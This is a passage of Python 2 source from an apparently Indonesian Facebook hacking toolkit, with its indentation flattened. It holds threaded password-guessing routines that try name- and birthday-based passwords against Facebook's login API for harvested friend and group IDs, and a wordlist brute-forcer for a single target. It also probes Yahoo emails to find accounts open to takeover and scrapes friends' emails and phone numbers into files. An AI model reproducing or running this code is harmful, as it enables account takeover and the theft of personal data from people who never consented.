print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.5)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '234'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' ==> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' ==> ' + b['name']
else:
pass2 = b['firs_name'] + '1'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' ==> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' ==> ' + ['name']
else:
pass3 = b['last_name'] + '234'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' ==> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' ==> ' + b['name']
else:
pass4 = b['last_name'] + '1'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' ==> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' ==> ' + b['name']
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' ==> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' ==> ' + b['name']
else:
pass6 = ('allahuakbar')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' ==> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' ==> ' + b['name']
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token Tidak Ada'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
